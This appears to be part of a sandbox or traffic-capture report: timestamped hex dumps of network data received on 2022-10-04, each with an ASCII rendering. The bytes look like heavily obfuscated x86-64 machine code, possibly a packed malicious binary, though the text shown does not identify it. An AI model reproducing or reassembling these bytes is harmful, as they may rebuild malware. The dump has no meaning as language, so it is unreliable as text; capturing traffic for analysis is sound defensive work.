8b 3a 33 fe f8 81 ef aa 36 3c 30 e9 9a 05 00 00 66 44 0f 4a d7 4d 8b d3 e9 38 d0 02 00 e9 04 3a
                                                                                                                                                                                                                                    Data Ascii: %DHD3IfDfDH+HAII+fDI@AA3fA9EoY>:tRDc@kEH@<fKNARA4DA1$ItHsfEzAZHcD:HU1@AIfzA:36<0fDJM8:
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14984INData Raw: 49 f7 c3 43 0e bf 38 e9 16 4f 00 00 55 c3 e9 5b 27 05 00 49 81 ea 01 00 00 00 41 0f b6 1a 66 41 0f b6 ca 41 d2 f0 44 13 c4 41 32 d9 66 41 0f b3 f0 d0 c3 fe c3 f6 db 80 c3 01 80 c1 2c f6 db 44 32 cb 66 44 85 d2 66 8b 0c 1c 41 c0 c0 5d 49 81 eb 02 00 00 00 66 41 89 0b 41 80 f0 1d 66 41 f7 d0 44 02 c4 49 81 ea 04 00 00 00 41 d3 e0 44 0f bf c7 66 41 d3 c0 45 8b 02 45 33 c1 f9 41 0f c8 e9 4e be 07 00 e9 a5 c5 00 00 e9 11 74 07 00 c1 c0 02 3a f5 f9 f7 d0 35 b9 6a 64 56 e9 25 b5 08 00 0f 84 78 6b fb ff 4c 8d 1d fb 3f 04 00 56 0f b6 30 41 81 fa 85 47 cf 43 33 f5 81 e6 ff 00 00 00 f9 f5 41 8b 34 b3 c1 ed 08 f8 33 ee e9 31 6b fb ff 33 cf 49 81 f8 dd 19 ed 42 0f c9 45 84 ed f7 d9 f5 f8 d1 c9 e9 70 f4 05 00 ff c5 f5 d1 cd f9 e9 9d 9b 0c 00 81 c2 50 05 ea 61 41 80 ff
                                                                                                                                                                                                                                    Data Ascii: IC8OU['IAfAADA2fA,D2fDfA]IfAAfADIADfAEE3ANt:5jdV%xkL?V0AGC3A431k3IBEpPaA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15000INData Raw: 17 56 e9 fe 19 fd ff d1 ca 81 ea f7 53 85 67 d1 c2 f7 da f5 53 41 0f bc da 41 0f bd da 31 14 24 41 0b d9 4c 0f ab db 5b 49 85 da 48 63 d2 66 f7 c2 f2 24 4c 03 ca e9 f5 6a 0e 00 55 c3 81 fa 66 0f 9b 53 81 fb 01 00 00 00 0f 85 31 20 06 00 48 8b c8 e9 22 54 0b 00 49 8b 13 41 84 c4 36 8b 2a 48 0f ba e0 f3 49 81 c3 04 00 00 00 49 81 fe 15 05 16 38 41 89 2b 80 ec e6 4c 0f ac e8 a2 49 63 c4 49 81 ea 04 00 00 00 41 8b 02 f8 33 c6 66 44 3b fe 0f c8 f8 35 08 7b 11 5c 0f c8 c1 c0 03 e9 aa b1 ff ff 49 8b 11 41 ff c2 41 80 c2 49 41 0a f6 4d 8b 51 08 48 f7 d2 48 0f ba f6 bd 40 0f 90 c6 40 d2 c6 49 f7 d2 0f b7 f3 49 23 d2 49 89 51 08 40 f6 d6 49 0f b7 f0 9c 40 0f 96 c6 f8 41 8f 01 f8 48 81 ed 04 00 00 00 8b 74 25 00 33 f7 e9 b1 7c fc ff 4c 8b 03 41 80 fc 24 36 4d 8b 10
                                                                                                                                                                                                                                    Data Ascii: VSgSAA1$AL[IHcf$LjUfS1 H"TIA6*HII8A+LIcIA3fD;5{\IAAIAMQHH@@II#IQ@I@AHt%3|LA$6M
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15016INData Raw: 66 41 0f c8 66 45 0f b6 c0 66 45 0f ab d0 44 32 d7 45 02 c6 66 44 0f b6 04 3c a8 9f 49 81 eb 02 00 00 00 66 45 85 f0 66 45 89 03 48 81 eb 04 00 00 00 44 8b 03 f6 c2 32 45 33 c2 f9 41 d1 c0 40 84 e4 e9 ca fd fe ff f5 40 3a cd 33 f7 e9 e0 c2 01 00 66 45 89 5a 08 66 41 0f cb 4c 0f bf da 9c 41 8f 02 45 8a dc 4c 2b db 44 8b 1e 66 81 ff 31 30 48 81 c6 04 00 00 00 44 3a de 44 33 db 41 f7 d3 41 81 c3 b9 7c 30 36 41 81 f3 b6 16 75 4d f8 f9 41 f7 db 41 81 eb 52 21 8d 22 e9 a3 ea 02 00 f5 f7 df e9 4c fa 0d 00 41 ff c8 f5 f9 41 c1 c0 02 e9 dc 08 02 00 0f ca f7 d2 e9 b4 23 09 00 e9 73 e3 06 00 66 41 81 fd 6f 36 45 33 cb 41 ff c1 44 3b f9 f5 41 f7 d9 41 81 c1 dc 08 19 4a f8 f5 41 c1 c9 02 41 53 41 d2 eb 44 31 0c 24 66 44 33 df 41 5b 4d 63 c9 49 03 e9 ff e5 e9 c7 db 04
                                                                                                                                                                                                                                    Data Ascii: fAfEfED2EfD<IfEfEHD2E3A@@:3fEZfALAEL+Df10HD:D3AA|06AuMAAR!"LAA#sfAo6E3AD;AAJAASAD1$fD3A[McI
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15032INData Raw: 00 00 00 66 ff c9 8b 4c 25 00 33 cf 80 fe 78 40 f6 c5 73 e9 98 25 08 00 41 f6 c6 80 0f c8 f9 57 31 04 24 5f 48 63 c0 f5 f8 e9 f5 4f 03 00 66 41 8b 13 41 ba 39 2d 21 42 41 fe c2 f8 41 8a 4b 02 66 41 81 ea 5d 4b 4c 0f bc d6 49 81 eb 06 00 00 00 41 0f bb f2 66 d3 ea 4c 0f 44 d4 66 41 89 53 08 4d 0f b7 d0 e9 40 90 09 00 41 3a e7 48 63 c0 66 81 ff eb 1e 48 03 e8 55 c3 41 0f c9 66 41 81 fd 85 42 41 f7 d9 41 f7 d1 41 53 44 31 0c 24 41 5b 66 f7 c6 40 1a 4d 63 c9 f9 49 03 e9 e9 22 b9 fc ff 48 03 eb e9 04 46 00 00 41 d1 c8 e9 4a 51 08 00 ff c0 35 d4 45 2f 0b f9 f7 d8 f7 d0 c1 c0 03 f5 66 81 fa 3e 49 0f c8 f8 41 51 31 04 24 41 59 f8 f9 f5 48 63 c0 f5 48 03 f0 e9 f5 c4 0d 00 ff cd e9 6f 6c 0d 00 49 ff c2 35 c7 1a e4 1a e9 93 74 fc ff 49 81 e9 01 00 00 00 44 84 f9 45
                                                                                                                                                                                                                                    Data Ascii: fL%3x@s%AW1$_HcOfAA9-!BAAKfA]KLIAfLDfASM@A:HcfHUAfABAAASD1$A[f@McI"HFAJQ5E/f>IAQ1$AYHcHolI5tIDE
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15048INData Raw: 81 e9 04 00 00 00 41 8b 19 44 3b f2 66 0f ba f2 a4 33 df 81 f3 bd 13 7b 15 48 0f bb c2 4c 0f ab ea 66 0f a4 d2 df 81 eb 06 79 a7 12 ff c2 f7 d3 0f cb 81 eb 43 75 ea 1d 0f cb 66 44 3b d0 57 40 8a fb 31 1c 24 f5 49 8b fa 5f 40 1a d6 66 99 66 40 0f b6 d4 49 81 e8 04 00 00 00 48 0f ba f2 d1 41 89 18 49 81 e9 04 00 00 00 80 f2 9b 0f bb d2 41 8b 11 f8 33 d7 81 f2 2e 65 7d 6e e9 d1 1a 05 00 44 31 04 24 66 41 0f bd dc 41 0f bc dd 5b f9 f5 f8 4d 63 c0 f8 41 3a d5 4d 03 c8 e9 ee 7e fc ff 66 41 3b e7 f9 57 66 0f bb df 40 02 fe 4c 0f a4 f7 b7 31 04 24 40 d2 e7 66 13 f9 5f 48 63 c0 f8 4c 03 c0 e9 0e 05 01 00 49 8b 0b 66 41 d3 d1 41 80 c9 b4 41 fe c9 49 8b 53 08 41 b1 c1 41 80 d9 8f f5 48 f7 d1 41 d2 d1 41 d2 e1 45 0f c0 c9 48 f7 d2 66 44 03 c8 48 23 ca 66 41 b9 c4 12
                                                                                                                                                                                                                                    Data Ascii: AD;f3{HLfyCufD;W@1$I_@ff@IHAIA3.e}nD1$fAA[McA:M~fA;Wf@L1$@f_HcLIfAAAISAAHAAEHfDH#fA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15064INData Raw: 66 0f 4b c3 b0 27 49 89 73 08 9c c0 f4 55 c0 c4 41 41 8f 03 41 0f b7 c3 48 81 eb 04 00 00 00 0f a4 c8 d6 f5 8b 03 41 f6 c0 d6 f5 33 c7 f7 d0 f8 f5 44 3a c7 35 7e 44 78 30 e9 c8 30 fa ff f5 f9 53 48 0f b7 de 66 87 db 44 31 1c 24 d2 f3 48 c1 f3 9f 66 0f ba f3 8f 5b 4d 63 db e9 08 73 04 00 41 f7 d1 e9 d8 5e 00 00 48 03 f1 e9 f4 d9 05 00 66 81 e9 7c 68 f8 f6 d0 c0 d9 c1 80 ed 50 44 0a c0 48 0f bf ca 66 45 89 43 08 49 0f bf cd 9c c0 dd 22 49 0f b7 ca 41 8f 03 49 81 ea 04 00 00 00 41 8b 0a 40 80 fc ad f5 41 33 c9 f5 c1 c9 02 f9 f8 44 84 e0 81 f1 7a 2f 61 5a f9 c1 c9 03 f9 e9 8e 9a fe ff 48 f7 d0 66 45 87 c0 48 0f c8 48 ff c0 41 d2 d8 4c 33 d8 45 03 c5 f5 44 0a c3 48 81 ef 08 00 00 00 66 41 ff c8 44 0b c1 48 89 07 e9 56 8d 09 00 66 0f b6 0b 40 80 e5 17 40 8a 6b
                                                                                                                                                                                                                                    Data Ascii: fK'IsUAAAHA3D:5~Dx00SHfD1$Hf[McsA^Hf|hPDHfECI"IAIA@A3Dz/aZHfEHHAL3EDHfADHVf@@k
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15080INData Raw: 89 10 66 0f ca 49 81 e9 04 00 00 00 41 0a d0 41 8b 11 40 80 fc 95 33 d7 e9 87 d3 02 00 ff cd 41 3a d1 66 45 85 cf f9 0f cd f9 66 45 3b e3 81 c5 d2 5f 9e 2a f8 d1 cd 56 66 0f 4d f4 c1 c6 0c 31 2c 24 66 0f be f3 48 33 f4 f9 5e 66 44 3b eb 66 f7 c5 69 19 48 63 ed f9 4c 03 cd e9 dd 60 fa ff f9 f7 d8 f5 66 81 fe 98 3a 41 53 31 04 24 41 0f ba f3 2d 44 0f bf d8 41 5b 48 63 c0 f5 41 80 fe 50 48 03 e8 e9 1b 0d fb ff 48 81 c3 04 00 00 00 f9 33 c5 49 f7 c4 a9 57 16 78 05 db 76 35 58 35 4d 0a d5 30 f7 d8 e9 5b b4 07 00 66 41 8b 03 66 41 8b 7b 02 49 81 eb 06 00 00 00 66 f7 d0 3a c7 f5 66 f7 d7 66 23 c7 66 41 89 43 08 48 0f c8 e9 a2 06 05 00 44 85 fc 35 96 6e 0a 46 4c 3b c3 f7 d8 ff c8 f8 a8 5c f7 d8 41 80 fe 08 f8 0f c8 f9 48 81 fa ae 47 ab 0a e9 36 ba 03 00 49 81 ea
                                                                                                                                                                                                                                    Data Ascii: fIAA@3A:fEfE;_*VfM1,$fH3^fD;fiHcL`f:AS1$A-DA[HcAPHH3IWxv5X5M0[fAfA{If:ff#fACHD5nFL;\AHG6I
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15096INData Raw: e7 dd 31 3c 24 c0 fb 48 66 0f be da 5b 48 63 ff 4c 03 cf e9 d3 67 00 00 4d 8b 0b 41 8a 6b 08 49 81 c3 0a 00 00 00 26 41 88 29 48 81 eb 04 00 00 00 66 44 0f ac e5 41 0f b7 ef 8b 2b f5 f9 41 33 ea 81 c5 e5 20 7d 7f 40 f6 c6 7b f7 dd f5 c1 cd 03 f5 66 81 fc d9 0c 0f cd 41 f6 c0 8b 41 52 48 81 fd ab 16 1b 44 41 c0 ca d3 66 41 0f ca 31 2c 24 41 5a f5 48 63 ed f5 44 3a e1 48 03 f5 e9 2f e9 01 00 49 03 f0 56 c3 ff c0 e9 5b 6c 04 00 41 f7 d1 e9 f0 28 06 00 e9 40 ea da ff 41 ff 33 80 da d5 fe ce 49 0f b7 d0 49 81 c3 08 00 00 00 66 41 0f b6 d4 9d 66 41 0f bd d5 66 44 0f ab ca 48 81 eb 04 00 00 00 8b 13 f5 f8 41 33 d2 e9 af 1a 0c 00 41 52 c3 41 ff c3 41 d1 cb e9 28 26 03 00 e9 0f 35 02 00 0f 85 92 c4 01 00 48 8b 44 25 00 41 80 fc 44 48 81 ec 20 00 00 00 ff d0 48 8b
                                                                                                                                                                                                                                    Data Ascii: 1<$Hf[HcLgMAkI&A)HfDA+A3 }@{fAARHDAfA1,$AZHcD:H/IV[lA(@A3IIfAfAfDHA3ARAA(&5HD%ADH H
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15112INData Raw: 1e 45 32 d9 66 44 0f 4a c0 49 d3 c0 48 81 ef 02 00 00 00 66 41 c1 f0 64 66 44 89 0f 49 f7 d8 44 02 c2 44 8b 06 f5 48 81 c6 04 00 00 00 f8 41 f6 c1 58 45 33 c3 e9 4a 58 0b 00 8b 3b 49 f7 c0 f9 73 41 7e e9 83 b3 fe ff 00 ae 43 c4 31 41 ff e1 41 ff e2 f9 57 49 0f 44 f9 31 34 24 0f a3 f7 66 81 f7 34 69 40 1a f9 5f 41 f6 c7 03 f9 48 63 f6 f5 44 3a cb 41 85 ef 4c 03 de e9 84 b1 f9 ff 41 ff e0 49 81 ea 01 00 00 00 41 2b d5 41 23 d7 81 ca 64 07 35 24 41 0f b6 12 41 32 d1 66 d3 d1 f6 da d0 c2 0f 91 c1 66 44 0f a3 e9 80 c2 0e 66 d3 f9 f8 80 d9 b1 80 f2 fb 66 44 0f ab c1 44 32 ca d2 e1 66 0f b6 0c 14 49 81 eb 02 00 00 00 66 41 d3 e0 66 41 89 0b 41 c0 e0 a7 49 81 ea 04 00 00 00 66 41 0f ac d8 0d 45 8b 02 45 33 c1 e9 9f ec ff ff 48 8b cb 48 81 eb 08 00 00 00 4d 8b c2
                                                                                                                                                                                                                                    Data Ascii: E2fDJIHfAdfDIDDHAXE3JX;IsA~C1AAWID14$f4i@_AHcD:ALAIA+A#d5$AA2ffDffDD2fIfAfAAIfAEE3HHM
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15128INData Raw: ff c9 66 f7 d7 66 0b d7 41 0f bf c8 0f 9c c1 66 41 89 53 08 66 0f c9 9c 66 41 0f b6 c8 41 1b ca 41 8f 03 1a ef 33 c9 49 81 ea 04 00 00 00 66 c1 f9 ec 41 8b 0a f5 66 41 f7 c2 3e 25 33 ce 81 c1 14 36 5e 58 f9 f8 d1 c9 f9 81 c1 d6 29 c7 66 f5 d1 c1 56 40 80 ce cb 31 0c 24 40 d2 ee 40 b6 ee 66 d3 f6 5e 41 3a e1 f5 48 63 c9 e9 d2 78 06 00 ff c0 f7 d8 e9 d3 44 05 00 ff e6 f7 d1 e9 24 dc f9 ff 41 33 c2 66 81 fe 45 39 41 84 d7 49 3b e2 f7 d0 66 41 f7 c0 ae 20 f5 35 d4 1f 99 3e 0f c8 e9 f0 c5 0b 00 66 41 f7 d3 40 fe c5 66 45 0f ac e3 01 66 44 0f 44 dc 40 32 dd 66 44 0f b6 1c 2c 41 f6 c2 5a 49 81 ea 02 00 00 00 4d 85 fa 66 45 89 1a 44 8b 1e 48 81 c6 04 00 00 00 e9 98 d4 07 00 8f 03 c6 c4 52 66 1d 3d 28 8b 07 f5 48 81 c7 04 00 00 00 41 33 c1 0f c8 c1 c8 02 e9 98 d5
                                                                                                                                                                                                                                    Data Ascii: ffAfASffAAA3IfAfA>%36^X)fV@1$@@f^A:HcxD$A3fE9AI;fA 5>fA@fEfDD@2fD,AZIMfEDHRf=(HA3
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15144INData Raw: 66 45 85 c8 55 48 0f ab cd 40 d2 c5 40 d2 cd 44 31 0c 24 40 c0 ed de 5d 4d 63 c9 41 f6 c0 c0 f8 40 84 ff 49 03 f1 e9 0c e4 04 00 49 8b 0b 66 0f 49 d9 66 0f bd db 66 0f b6 19 49 81 c3 06 00 00 00 c0 ed 7f 48 0f bd ce 66 41 89 1b 80 d1 41 d2 e5 49 81 ea 04 00 00 00 81 c1 96 48 77 24 66 44 0f ac d9 aa c0 f5 47 41 8b 0a 41 33 c9 f5 44 84 f6 f7 d1 4d 85 d8 45 3a ec 81 f1 b1 22 13 4f f8 c1 c9 02 41 f6 c0 a8 f5 41 3b cf f7 d1 f8 3b cd 41 51 49 0f b3 f1 31 0c 24 41 59 48 63 c9 e9 bf 1f 06 00 41 ff c8 e9 1f 9d fc ff 44 0f b6 0b 48 81 c3 01 00 00 00 66 41 0f b3 fb 44 32 cd 41 c0 c8 9d 66 41 0f ba fb 4e 66 41 0f ba e3 61 41 d0 c9 41 f6 d9 66 44 0f be dc 41 b3 3c 41 d0 c9 41 fe c9 41 0f 98 c0 41 32 e9 45 0f bf c1 44 0f 44 c6 66 44 0f b6 c6 66 46 0f b6 1c 0c 41 0f 97
                                                                                                                                                                                                                                    Data Ascii: fEUH@@D1$@]McA@IIfIffIHfAAIHw$fDGAA3DME:"OAA;;AQI1$AYHcADHfAD2AfANfAaAAfDA<AAAA2EDDfDfFA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15160INData Raw: 46 4b 95 85 d8 dd a5 82 af 67 f4 8b 36 f1 c4 8c 41 04 c9 84 cc 92 f9 83 bb 28 a8 8a 22 be 98 8d 55 1d 0d e9 cb 8b 3d ee bc 31 6c e7 25 a7 5c e0 52 36 41 5f c2 a0 71 58 b5 1a 20 51 2c 8c 10 56 5b 2f 85 32 c5 b9 b5 35 b2 03 e4 3c 2b 95 d4 3b 5c a8 f9 5d ea 3e c9 5a 9d 84 98 53 04 12 a8 54 73 b1 3d 30 ed 27 0d 37 9a 9d 5c 3e 03 0b 6c 39 74 9a 71 86 e4 0c 41 81 93 b6 10 88 0a 20 20 8f 7d 83 b5 eb e3 15 85 ec 94 af d4 e5 0d 39 e4 e2 7a cc e9 ea f7 5a d9 ed 80 e0 88 e4 19 76 b8 e3 6e d5 2d 87 f0 43 1d 80 87 f9 4c 89 1e 6f 7c 8e 69 fe 61 31 f9 68 51 36 8e d2 00 3f 17 44 30 38 60 e7 a5 5c fe 71 95 5b 89 cb c4 52 10 5d f4 55 67 f9 41 f7 d1 41 d1 c1 e9 76 dd fd ff 48 81 ed 01 00 00 00 41 0f 93 c0 f8 44 0f b6 54 25 00 44 32 d7 66 44 0f b6 c1 41 f6 d2 41 d0 c2 66 41
                                                                                                                                                                                                                                    Data Ascii: FKg6A("U=1l%\R6A_qX Q,V[/25<+;\]>ZSTs=0'7\>l9tqA }9zZvn-CLo|ia1hQ6?D08`\q[R]UgAAvHADT%D2fDAAfA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15176INData Raw: 65 49 8b 12 4d 0f b7 d5 45 2a d2 49 89 13 4d 0f ab ea f8 48 81 eb 04 00 00 00 e9 09 74 fa ff fe c3 66 44 0f be c3 66 0f ba e2 bb d0 c3 4d 0f bf c1 fe c3 c0 ca 79 66 0f a3 da d0 cb 49 0f c8 66 0f bc d4 44 32 db 66 99 66 0f b6 14 1c 66 45 0f bc c6 66 41 0f ba f8 40 48 81 ef 02 00 00 00 66 41 0f c8 41 f6 d0 66 89 17 45 0f bf c2 66 41 0f ba f8 33 49 d3 f8 44 8b 06 48 81 c6 04 00 00 00 45 33 c3 f8 f9 e9 f2 5b fc ff f5 f6 c7 b8 48 63 c0 66 f7 c2 eb 7a 4c 03 d0 e9 f1 00 fe ff ff c8 48 81 fe 05 72 a1 61 f7 d8 2d 15 34 e5 5e e9 f5 75 05 00 41 d1 c8 41 f7 d0 40 84 e6 40 80 fe 70 f9 41 51 44 2b c8 66 45 0f b3 c1 f5 44 31 04 24 45 23 c9 41 0f 9e c1 66 44 0f be ce 41 59 66 f7 c3 da 2d 4d 63 c0 49 03 f0 e9 59 b3 fe ff ff ca e9 db 93 08 00 56 c3 66 41 8b 3a 66 41 81 ff
                                                                                                                                                                                                                                    Data Ascii: eIME*IMHtfDfMyfIfD2fffEfA@HfAAfEfA3IDHE3[HcfzLHra-4^uAA@@pAQD+fED1$E#AfDAYf-McIYVfA:fA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15192INData Raw: c4 62 03 00 48 8b 44 dd 00 f8 81 fb 01 00 00 00 e9 00 16 09 00 66 45 0f b6 03 41 8a 6b 02 49 81 eb 06 00 00 00 66 0f be fb 48 81 c7 e2 34 c7 3d 40 86 ff 41 f6 d0 49 1b fa 40 c0 d7 b9 48 f7 c2 1d 65 66 26 40 f6 d5 44 0a c5 48 63 f9 66 45 89 43 08 48 0f b7 fc e9 db 57 01 00 49 8b 2b 41 8b 53 08 f8 f5 49 81 c3 0c 00 00 00 f8 f5 89 54 25 00 0f b7 e9 49 81 ea 04 00 00 00 41 8b 2a f5 f8 33 ee 81 c5 ef 3e 31 7d f9 66 81 fd f5 0f 41 84 f4 f7 dd e9 06 1c 08 00 66 44 8b 1b 49 0f ba f8 a3 41 80 f2 1b 48 81 c3 02 00 00 00 41 fe ca 41 80 c0 26 44 0f b6 07 48 81 c7 01 00 00 00 45 32 c1 49 0f a3 fa 41 80 f0 37 41 fe c0 49 f7 c6 42 7b fb 50 41 c1 fa 77 f9 41 80 f0 31 66 41 ff c2 41 0f 95 c2 41 f6 d0 4d 63 d7 41 fe c0 41 80 c2 c4 49 0f ca f9 45 32 c8 45 0f b7 d7 66 46 89
                                                                                                                                                                                                                                    Data Ascii: bHDfEAkIfH4=@AI@Hef&@DHcfECHWI+ASIT%IA*3>1}fAfDIAHAA&DHE2IA7AIB{PAwA1fAAAMcAAIE2EfF
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15208INData Raw: 00 49 81 f9 b5 05 0d 56 41 84 d6 44 33 db 66 f7 c6 09 2a 4d 3b da f9 41 81 f3 88 57 bb 1f e9 ca 8e 00 00 81 fb 03 00 00 00 e9 35 17 04 00 41 f7 d2 41 ff c2 41 f6 c3 cd f9 41 f7 d2 66 41 f7 c6 29 43 f9 41 81 ea f2 22 7f 31 e9 fb 42 02 00 41 51 c3 0f 85 a8 c8 f7 ff 48 8b d0 e9 6a c2 fa ff 41 ff c0 40 84 e1 53 c0 cb d7 41 0b dc f9 44 31 04 24 66 c1 d3 6a e9 05 6b f9 ff 56 c3 ff c6 44 3a fe f9 81 f6 b5 08 3f 43 57 31 34 24 41 0f bc fd 5f 40 3a cf 48 63 f6 f8 e9 65 2e 00 00 48 85 d2 0f 84 4b 7d 05 00 4c 8d 0d b3 4f 00 00 0f b6 74 25 00 f5 49 85 d4 33 f0 81 e6 ff 00 00 00 f8 f5 41 8b 34 b1 c1 e8 08 f5 33 c6 e9 57 7a 04 00 ff e6 41 ff c0 56 40 c0 c6 0e 66 0f ac c6 be 44 31 04 24 5e 4d 63 c0 41 3b c6 f9 4d 03 c8 e9 94 3e 05 00 55 40 0f 90 c5 44 31 04 24 66 81 ed
                                                                                                                                                                                                                                    Data Ascii: IVAD3f*M;AW5AAAAfA)CA"1BAQHjA@SAD1$fjkVD:?CW14$A_@:Hce.HK}LOt%I3A43WzAV@fD1$^McA;M>U@D1$f
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15224INData Raw: 3b 40 84 cf 0f cb 57 31 1c 24 66 0f ba e7 0f 66 c1 df 83 5f 80 f9 8d 48 63 db e9 c8 fc 07 00 41 f7 da e9 b0 9d f9 ff 41 ff e1 e9 c5 35 00 00 49 8b 08 40 c0 de d9 49 c1 d3 da 40 d2 fe 41 8b 70 08 41 80 f8 b9 41 fe cb 49 81 c0 0c 00 00 00 66 45 13 db 36 89 31 49 81 e9 04 00 00 00 66 41 c1 d3 46 45 8b 19 f8 66 81 ff 9f 0f 44 3a f6 44 33 df 48 f7 c4 95 24 d0 11 41 81 eb e9 2c 21 14 41 d1 c3 41 81 c3 fa 69 a7 3a e9 e7 c4 00 00 0f ca f8 f5 c1 ca 02 ff ca 41 51 41 d2 c1 49 0f ba f1 16 31 14 24 41 59 66 41 81 f9 4d 0a 48 63 d2 48 03 f2 e9 c4 17 08 00 89 57 08 e9 46 8e f7 ff 4d 8b 03 e9 e5 92 fa ff f8 40 d0 cd 40 80 ed de 40 f6 d5 e9 93 aa fe ff 49 c1 d2 17 45 8b 0b 41 c0 d2 41 48 81 c7 04 00 00 00 44 0f bf d6 44 89 0f 44 02 d5 66 44 23 d2 49 0f bb f2 44 8b 13 48
                                                                                                                                                                                                                                    Data Ascii: ;@W1$ff_HcAA5I@I@ApAAIfE61IfAFEfD:D3H$A,!AAi:AQAI1$AYfAMHcHWFM@@@IEAAHDDDfD#IDH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15240INData Raw: 41 81 f8 50 3e 66 85 e3 4d 85 c0 e9 87 9e 04 00 41 53 c3 41 ff cb e9 c9 92 ff ff 41 ff c8 41 53 41 d3 c3 41 d3 cb 41 0f ba f3 08 44 31 04 24 81 fd f7 26 a9 72 4c 0f 44 db 41 5b 4d 63 c0 f8 49 03 e8 e9 75 69 04 00 49 8b 0a 45 0f bf c1 41 8b 7a 08 41 d2 c0 49 0f ba f8 09 49 81 c2 0c 00 00 00 36 89 39 44 8b 06 f6 c7 58 48 81 c6 04 00 00 00 44 33 c3 e9 74 7c fd ff 41 ff c0 e9 98 7d 08 00 49 8b 3b 80 da a4 c0 de 02 49 8b 53 08 66 41 c1 c8 1c 41 80 e8 21 49 81 c3 10 00 00 00 36 48 89 17 49 c1 d8 c2 49 81 ea 04 00 00 00 45 8b 02 45 3a e6 f8 44 33 c6 41 f7 d8 e9 e6 0f 09 00 44 84 c2 48 63 c9 f8 48 03 f1 e9 1b ea 08 00 ff c7 d1 c7 66 41 f7 c4 66 3c 66 44 85 c3 56 49 23 f1 31 3c 24 48 c1 f6 a0 5e e9 eb 0b fc ff f8 49 f7 c0 a6 12 da 72 48 63 c0 f9 4c 03 c8 e9 c5 79
                                                                                                                                                                                                                                    Data Ascii: AP>fMASAAASAAAD1$&rLDA[McIuiIEAzAII69DXHD3t|A}I;ISfAA!I6HIIEE:D3ADHcHfAf<fDVI#1<$H^IrHcLy
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15256INData Raw: 66 f7 d1 80 dd e2 66 44 33 cd 66 40 0f b6 cc c0 c1 96 0f ba f1 29 49 81 eb 02 00 00 00 c0 ed 27 66 0f ba f9 a2 66 41 89 2b c1 e1 e5 fe c9 66 ff c1 49 81 ea 04 00 00 00 66 41 0f bc cd 40 f6 c5 53 c0 ed 4f 41 8b 0a 66 81 f9 e7 6f f8 41 33 c9 41 81 fd 5a 43 f3 34 81 f1 56 0a 30 38 f9 c1 c1 02 f9 f8 81 c1 34 4e 78 17 f5 66 f7 c1 16 46 40 84 f6 f7 d9 81 e9 46 64 57 12 f6 c4 6e f9 e9 2b d1 03 00 f7 d8 e9 a1 43 f9 ff 48 03 f2 e9 0e 34 03 00 ff cb 45 85 ec 44 3b e3 81 f3 4c 20 23 64 f5 e9 d9 b6 01 00 00 00 00 11 76 46 24 87 46 41 53 3d 17 48 ca ab 27 4f bd 08 b2 2b 23 9e 82 2c 54 24 d3 25 cd b2 e3 22 ba 23 fe 9d 2a b5 ce 9a 5d 0f 9f 93 c4 99 af 94 b3 3a 3a f0 2d ac 0a f7 5a 16 5b fe c3 80 6b f9 b4 75 66 f1 39 e3 56 f6 4e 59 07 ff d7 cf 37 f8 a0 6c a2 9c 3e fa 92
                                                                                                                                                                                                                                    Data Ascii: ffD3f@)I'ffA+fIfA@SOAfoA3AZC4V084NxfF@FdWn+CH4ED;L #dvF$FAS=H'O+#,T$%"#*]::-Z[kuf9VNY7l>
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15272INData Raw: 60 c4 22 2c f0 52 12 2b 87 e8 43 22 1e 7e 73 25 69 dd e6 41 f7 4b d6 46 80 f1 87 4f 19 67 b7 48 6e ca db f2 ae 5c eb f5 d9 e6 ba fc 40 70 8a fb 37 d3 1f 9f a9 45 2f 98 de ff 7e 91 47 69 4e 96 30 f8 53 29 a0 6e 63 2e d7 d4 32 27 4e 42 02 20 39 e1 97 44 a7 77 a7 43 d0 cd f6 4a 49 5b c6 4d 3e ae cb 45 b3 38 fb 42 c4 82 aa 4b 5d 14 9a 4c 2a b7 0f 28 b4 21 3f 2f c3 9b 6e 26 5a 0d 5e 21 2d 9c 43 9e bd 0a 73 99 ca b0 22 90 53 26 12 97 24 85 87 f3 ba 13 b7 f4 cd a9 e6 fd 54 3f d6 fa 23 02 fb 9c 95 94 cb 9b e2 2e 9a 92 7b b8 aa 95 0c 1b 3f f1 92 8d 0f f6 e5 37 5e ff 7c a1 6e f8 0b 30 73 47 9b a6 43 40 ec 1c 12 49 75 8a 22 4e 02 29 b7 2a 9c bf 87 2d eb 05 d6 24 72 93 e6 23 05 66 eb 2b 88 f0 db 2c ff 4a 8a 25 66 dc ba 22 11 7f 2f 46 8f e9 1f 41 f8 53 4e 48 61 c5 7e
                                                                                                                                                                                                                                    Data Ascii: `",R+C"~s%iAKFOgHn\@p7E/~GiN0S)nc.2'NB 9DwCJI[M>E8BK]L*(!?/n&Z^!-Cs"S&$T?#.{?7^|n0sGC@Iu"N)*-$r#f+,J%f"/FASNHa~
